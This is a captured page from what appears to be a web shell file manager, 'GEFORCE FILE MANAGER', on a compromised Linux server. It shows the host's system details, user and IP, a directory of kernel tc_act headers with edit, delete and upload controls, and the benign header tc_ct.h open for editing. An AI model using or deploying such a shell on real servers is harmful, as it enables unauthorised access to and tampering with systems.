[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.63.1.el8_10.x86_64
/
include
/
net
/
tc_act
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 tc_bpf.h
663 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_connmark.h
392 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_csum.h
798 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_ct.h
2,140 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_ctinfo.h
585 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_defact.h
278 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_gact.h
1,729 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_gate.h
2,678 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_ife.h
2,143 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_ipt.h
324 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_mirred.h
1,440 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_mpls.h
2,004 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_nat.h
404 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_pedit.h
2,372 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_police.h
4,892 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_sample.h
918 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_skbedit.h
3,703 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_skbmod.h
765 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_tunnel_key.h
2,371 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_vlan.h
2,269 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: tc_ct.h
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef __NET_TC_CT_H #define __NET_TC_CT_H #include <net/act_api.h> #include <uapi/linux/tc_act/tc_ct.h> #if IS_ENABLED(CONFIG_NF_CONNTRACK) #include <net/netfilter/nf_nat.h> #include <net/netfilter/nf_conntrack_labels.h> struct tcf_ct_params { struct nf_conn *tmpl; u16 zone; u32 mark; u32 mark_mask; u32 labels[NF_CT_LABELS_MAX_SIZE / sizeof(u32)]; u32 labels_mask[NF_CT_LABELS_MAX_SIZE / sizeof(u32)]; struct nf_nat_range2 range; bool ipv4_range; u16 ct_action; struct rcu_head rcu; struct tcf_ct_flow_table *ct_ft; struct nf_flowtable *nf_ft; }; struct tcf_ct { struct tc_action common; struct tcf_ct_params __rcu *params; }; #define to_ct(a) ((struct tcf_ct *)a) #define to_ct_params(a) \ ((struct tcf_ct_params *) \ rcu_dereference_protected(to_ct(a)->params, \ lockdep_is_held(&a->tcfa_lock))) static inline uint16_t tcf_ct_zone(const struct tc_action *a) { return to_ct_params(a)->zone; } static inline int tcf_ct_action(const struct tc_action *a) { return to_ct_params(a)->ct_action; } static inline struct nf_flowtable *tcf_ct_ft(const struct tc_action *a) { return to_ct_params(a)->nf_ft; } #else static inline uint16_t tcf_ct_zone(const struct tc_action *a) { return 0; } static inline int tcf_ct_action(const struct tc_action *a) { return 0; } static inline struct nf_flowtable *tcf_ct_ft(const struct tc_action *a) { return NULL; } #endif /* CONFIG_NF_CONNTRACK */ #if IS_ENABLED(CONFIG_NET_ACT_CT) static inline void tcf_ct_flow_table_restore_skb(struct sk_buff *skb, unsigned long cookie) { enum ip_conntrack_info ctinfo = cookie & NFCT_INFOMASK; struct nf_conn *ct; ct = (struct nf_conn *)(cookie & NFCT_PTRMASK); nf_conntrack_get(&ct->ct_general); nf_ct_set(skb, ct, ctinfo); } #else static inline void tcf_ct_flow_table_restore_skb(struct sk_buff *skb, unsigned long cookie) { } #endif static inline bool is_tcf_ct(const struct tc_action *a) { #if defined(CONFIG_NET_CLS_ACT) && IS_ENABLED(CONFIG_NF_CONNTRACK) if (a->ops && a->ops->id == TCA_ID_CT) return true; #endif return false; } #endif /* __NET_TC_CT_H */